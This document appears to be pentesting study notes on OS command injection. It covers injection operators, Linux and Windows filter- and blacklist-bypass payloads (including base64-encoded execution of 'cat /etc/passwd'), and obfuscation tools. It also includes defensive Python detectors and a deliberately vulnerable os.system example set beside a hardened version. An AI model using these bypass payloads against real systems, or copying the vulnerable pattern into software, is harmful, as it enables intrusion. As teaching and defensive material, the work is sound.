# Command injections

[Hacktricks](https://book.hacktricks.xyz/pentesting-web/command-injection)

[PayloadAlltheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)

[PortSwigger](https://portswigger.net/web-security/os-command-injection)

## Injection operators

| Injection Operator | Injection Character | URL-Encoded Character | Executed Command |
|---|---|---|---|
| Semicolon | `;` | `%3b` | Both |
| New Line | `\n` | `%0a` | Both |
| Background | `&` | `%26` | Both (second output generally shown first) |
| Pipe | `\|` | `%7c` | Both (only second output is shown) |
| AND | `&&` | `%26%26` | Both (only if first succeeds) |
| OR | `\|\|` | `%7c%7c` | Second (only if first fails) |
| Sub-Shell | ``` `` ``` | `%60%60` | Both (Linux-only) |
| Sub-Shell | `$()` | `%24%28%29` | Both (Linux-only) |
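The same table doubles as a detection rule. As an added example (not part of the original page), the Python snippet below URL-decodes every query parameter twice, so double-encoded operators are caught as well, and reports which operators from the table appear. The `/ping?ip=` endpoint and the request lines are constructed for the example.

```python
from urllib.parse import parse_qsl, unquote

# Injection operators from the table above. Longer tokens come first so that
# "&&" is reported as AND rather than as two Background operators.
OPERATORS = [
    ("AND", "&&"),
    ("OR", "||"),
    ("Sub-Shell", "$("),
    ("Sub-Shell", "`"),
    ("Semicolon", ";"),
    ("New Line", "\n"),
    ("Background", "&"),
    ("Pipe", "|"),
]


def find_operators(value):
    """Return the operator names present in an already-decoded parameter value."""
    found = []
    rest = value
    for name, token in OPERATORS:
        if token in rest:
            found.append(name)
            rest = rest.replace(token, " ")  # consume so "&&" is not also counted as "&"
    return found


def scan_query_string(query):
    """Return (param, decoded_value, operators) for every parameter carrying an operator."""
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decoded once; a second unquote catches double-encoded
        # payloads such as %2526 -> %26 -> &.
        decoded = unquote(value)
        ops = find_operators(decoded)
        if ops:
            hits.append((name, decoded, ops))
    return hits


def scan_access_log(lines):
    """Run the query-string check over raw request lines and return the alerts."""
    alerts = []
    for line in lines:
        parts = line.split()
        if len(parts) < 2 or "?" not in parts[1]:
            continue
        query = parts[1].split("?", 1)[1]
        for param, decoded, ops in scan_query_string(query):
            alerts.append({"request": parts[1], "param": param,
                           "value": decoded, "operators": ops})
    return alerts


# Constructed sample request lines for a hypothetical /ping?ip= endpoint.
SAMPLE_LOG = [
    "GET /ping?ip=10.10.14.2 HTTP/1.1",
    "GET /ping?ip=10.10.14.2%3bwhoami HTTP/1.1",              # ; operator
    "GET /ping?ip=10.10.14.2%0awhoami HTTP/1.1",              # newline operator
    "GET /ping?ip=10.10.14.2%26%26whoami HTTP/1.1",           # && operator
    "GET /ping?ip=10.10.14.2%2524%2528whoami%2529 HTTP/1.1",  # double-encoded $()
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(f"{alert['param']}={alert['value']!r}: {', '.join(alert['operators'])}")
```

A raw `&` in a query string is a parameter separator, which is why the encoded forms in the table matter: the check has to run on the decoded value of each parameter, not on the raw request line.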

## Linux

| Code | Description |
|---|---|
| `printenv` | Can be used to view all environment variables |
| **Spaces** | |
| `%09` | Using tabs instead of spaces |
| `${IFS}` | Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. `$()`) |
| `{ls,-la}` | Commas will be replaced with spaces |
| **Other Characters** | |
| `${PATH:0:1}` | Will be replaced with `/` |
| `${LS_COLORS:10:1}` | Will be replaced with `;` |
| `$(tr '!-}' '"-~'<<<[)` | Shift character by one (`[` -> `\`) |

### Blacklisted Command Bypass

| Code | Description |
|---|---|
| **Character Insertion** | |
| `'` or `"` | Total must be even |
| `$@` or `\` | Linux only |
| **Case Manipulation** | |
| `$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")` | Execute command regardless of case |
| `$(a="WhOaMi";printf %s "${a,,}")` | Another variation of the technique |
| **Reversed Commands** | |
| `echo 'whoami' \| rev` | Reverse a string |
| `$(rev<<<'imaohw')` | Execute reversed command |
| **Encoded Commands** | |
| `echo -n 'cat /etc/passwd \| grep 33' \| base64` | Encode a string with base64 |
| `bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)` | Execute b64 encoded string |
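The space substitutions and blacklist bypasses in the two tables above exist because denylist filters look for specific characters while the shell has many ways to express the same thing. As an added example (not the page's own code), the Python snippet below puts the vulnerable pattern (untrusted input concatenated into a shell command) next to a denylist filter of the kind these bypasses defeat and next to the hardened form: an allowlist on the shape of the value plus `subprocess.run` with an argument list and no shell, so the value can never become an operator. The `ping` use case, the denylist contents and the host regex are assumptions made for the example.

```python
import os
import re
import subprocess


def ping_vulnerable(host):
    # VULNERABLE: the untrusted value is pasted into a shell command line, so every
    # operator in the table above (; newline & | && || `` $()) is interpreted by /bin/sh.
    return os.system("ping -c 1 " + host)


# Weak mitigation: a denylist of "dangerous" characters (constructed for the example).
# The space substitutions (${IFS}, {a,b}, %09) and the newline operator show why a
# list like this is never complete.
DENYLIST = (";", "|", "&", "`", "$(", " ")


def denylist_accepts(host):
    return not any(token in host for token in DENYLIST)


# Hardened mitigation, step 1: an allowlist on the *shape* of the value
# (IPv4 dotted quad or a DNS hostname) instead of a list of bad characters.
HOST_RE = re.compile(
    r"(?:\d{1,3}(?:\.\d{1,3}){3}"                      # IPv4
    r"|[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"   # first hostname label
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*)"  # further labels
)


def build_ping_argv(host):
    """Validate host against the allowlist and return the argv list, or raise."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "1", host]


def allowlist_accepts(host):
    try:
        build_ping_argv(host)
        return True
    except ValueError:
        return False


def ping_hardened(host):
    # Step 2: no shell. With a list and shell=False (the default) the arguments go
    # straight to execve(), so a metacharacter that somehow passed validation would
    # reach ping as a literal argument, never as a shell operator.
    return subprocess.run(build_ping_argv(host), capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    for candidate in ("10.10.14.2", "10.10.14.2;whoami", "10.10.14.2\nwhoami"):
        print(f"{candidate!r:>24}  denylist={denylist_accepts(candidate)}"
              f"  allowlist={allowlist_accepts(candidate)}")
```

The two defences are independent: the allowlist stops the request at the edge, and the argv list without a shell means that even a validation gap does not turn the value into a command. Either one alone is what the bypass tables are written against; together they remove the shell from the picture entirely.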

## Windows

### Filtered Character Bypass

| Code | Description |
|---|---|
| `Get-ChildItem Env:` | Can be used to view all environment variables (PowerShell) |
| **Spaces** | |
| `%09` | Using tabs instead of spaces |
| `%PROGRAMFILES:~10,-5%` | Will be replaced with a space (CMD) |
| `$env:PROGRAMFILES[10]` | Will be replaced with a space (PowerShell) |
| **Other Characters** | |
| `%HOMEPATH:~0,-17%` | Will be replaced with `\` (CMD) |
| `$env:HOMEPATH[0]` | Will be replaced with `\` (PowerShell) |

### Blacklisted Command Bypass

| Code | Description |
|---|---|
| **Character Insertion** | |
| `'` or `"` | Total must be even |
| `^` | Windows only (CMD) |
| **Case Manipulation** | |
| `WhoAmi` | Simply send the command in mixed case |
| **Reversed Commands** | |
| `"whoami"[-1..-20] -join ''` | Reverse a string |
| `iex "$('imaohw'[-1..-20] -join '')"` | Execute reversed command |
| **Encoded Commands** | |
| `[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))` | Encode a string with base64 |
| `iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"` | Execute b64 encoded string |

## Evasion Tools

### Linux

A handy tool we can utilize for obfuscating bash commands is [Bashfuscator](https://github.com/Bashfuscator/Bashfuscator).

```
git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
python3 setup.py install --user
```

### Windows

There is also a very similar tool that we can use for Windows called [DOSfuscation](https://github.com/danielbohannon/Invoke-DOSfuscation). Unlike `Bashfuscator`, this is an interactive tool.

```
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
Invoke-DOSfuscation> help
```

We can even use `tutorial` to see an example of how the tool works. Once we are set, we can start using the tool, as follows:

```
Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
Invoke-DOSfuscation> encoding
Invoke-DOSfuscation\Encoding> 1

...SNIP...
Result:
typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt
```

Finally, we can try running the obfuscated command on `CMD`, and we see that it indeed works as expected:

```
C:\htb> typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt

test_flag
```
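The obfuscated command above is a useful detection sample: a legitimate command line rarely contains half a dozen environment-variable substring expansions. As an added example (not from this page or from the Invoke-DOSfuscation project), the Python snippet below counts the run-time character-assembly forms listed in the Linux and Windows tables (`%VAR:~n,m%`, `$env:VAR[n]`, `${VAR:n:m}`, `${IFS}`, `{a,b}`) in a single command line and flags it once the total reaches a threshold. The regexes and the threshold of 3 are assumptions; the threshold should be tuned against your own process-creation telemetry.

```python
import re

# Run-time character-assembly forms from the Linux and Windows tables above.
# Constructed regexes (assumptions), keyed by the form each one matches.
PATTERNS = {
    "cmd_substring": re.compile(r"%[A-Za-z_][A-Za-z0-9_()]*:~-?\d+(?:,-?\d+)?%"),      # %TEMP:~-3,-2%
    "ps_index": re.compile(r"\$env:[A-Za-z_][A-Za-z0-9_]*\[-?\d+\]"),                 # $env:HOMEPATH[0]
    "bash_substring": re.compile(r"\$\{[A-Za-z_][A-Za-z0-9_]*:-?\d+(?::-?\d+)?\}"),   # ${PATH:0:1}
    "bash_ifs": re.compile(r"\$\{IFS\}"),                                              # ${IFS}
    "bash_brace_args": re.compile(r"\{[A-Za-z0-9_./-]+(?:,[A-Za-z0-9_./-]*)+\}"),      # {ls,-la}
}


def count_obfuscation_markers(command_line):
    """Count each marker form in a single command line."""
    return {name: len(rx.findall(command_line)) for name, rx in PATTERNS.items()}


def looks_obfuscated(command_line, threshold=3):
    """Flag a command line once the total number of markers reaches the threshold."""
    return sum(count_obfuscation_markers(command_line).values()) >= threshold


# Sample 1: the Invoke-DOSfuscation output shown above (copied from this page).
DOSFUSCATED = (
    r"typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu"
    r"%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt"
)
# Sample 2: the same command before obfuscation (also from the page).
PLAIN_CMD = r"type C:\Users\htb-student\Desktop\flag.txt"
# Sample 3: a constructed Linux line built only from substitutions in the Linux table.
LINUX_SAMPLE = "cat${IFS}${PATH:0:1}etc${PATH:0:1}passwd"
# Sample 4: a constructed benign PowerShell line with a single index expression,
# which stays under the threshold.
PS_BENIGN = "Write-Output $env:HOMEPATH[0]"

if __name__ == "__main__":
    for label, line in (("dosfuscated", DOSFUSCATED), ("plain", PLAIN_CMD),
                        ("linux", LINUX_SAMPLE), ("ps_benign", PS_BENIGN)):
        counts = count_obfuscation_markers(line)
        print(f"{label:12} flagged={looks_obfuscated(line)} {counts}")
```

Counting forms rather than matching exact strings is what makes this robust: the DOSfuscation output changes with every environment variable it picks, but the number of `%VAR:~n,m%` expansions needed to spell out a command stays high.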

